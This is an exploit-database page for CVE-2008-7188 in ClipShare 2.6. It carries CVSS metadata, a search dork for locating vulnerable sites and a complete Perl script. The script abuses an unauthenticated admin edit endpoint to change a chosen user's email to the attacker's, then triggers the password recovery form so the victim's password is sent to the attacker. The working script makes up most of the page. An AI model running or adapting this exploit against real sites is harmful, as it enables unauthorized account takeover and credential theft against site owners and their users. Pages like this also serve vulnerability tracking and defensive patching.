Exploit: ClipShare 2.6 Remote User Password Change Exploit ( Ascii Version )

Search:
WLB2

ClipShare 2.6 Remote User Password Change Exploit

Published / (Updated)
Credit
Risk
2009-09-10 / 2012-01-30
Pr0metheuS
High
CWE
CVE
Local
Remote
CWE-264
CVE-2008-7188
No
Yes
 Dork: "Powered by Clipshare"

Plain text version

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

#!/usr/bin/perl -w
#priv8
#Pr0metheuS
#Exploit Name: Clipshare Remote User Password Change Exploit
#Version Script: Clipshare 2.6
#Dork: "Powered by Clipshare"
#EnjoY
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-";
print "\nClipshare 2.6 Remote User Passord Change Exploit\n";
print "\nBy Pr0metheuS \n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
print "Site Address:\n";
$SITE = <STDIN>;
chomp $SITE;
print "Path to Site:\n";
$PATH = <STDIN>;
chomp $PATH;
print "ID user:\n";
$ID = <STDIN>;
chomp $ID;
print "Your Email(to send user password):\n";
$EM = <STDIN>;
chomp $EM;
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => "$SITE$PATH/siteadmin/useredit.php?action=edit&uid=$ID");
$req->content_type('application/x-www-form-urlencoded');
$req->content("email=$EM&fname=&lname=&city=&country=United+States&website=&occupation=&
amp;company=&school=&interest_hobby=&fav_movie_show=&fav_book=&fav_music=&aboutme=&emailveri
fied=no&account_status=Active&submit=Update");
$res = $ua->request($req);
if (($res->content =~ /$EM/)) {
print "Update!\n";
use LWP::UserAgent;
$ua2 = new LWP::UserAgent;
$ua2->agent("Mozilla/8.0");
$ua2 = LWP::UserAgent->new;
my $req2 = HTTP::Request->new(POST => "$SITE$PATH/recoverpass.php");
$req2->content_type('application/x-www-form-urlencoded');
$req2->content("email=$EM&recover=Submit");
$res = $ua2->request($req2);
print "Check your Email!\n";
}
else{
print "Wrong ID or path!";
}

References:

http://xforce.iss.net/xforce/xfdb/39494
http://www.securityfocus.com/bid/27148
http://www.milw0rm.com/exploits/4837
http://secunia.com/advisories/28313

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version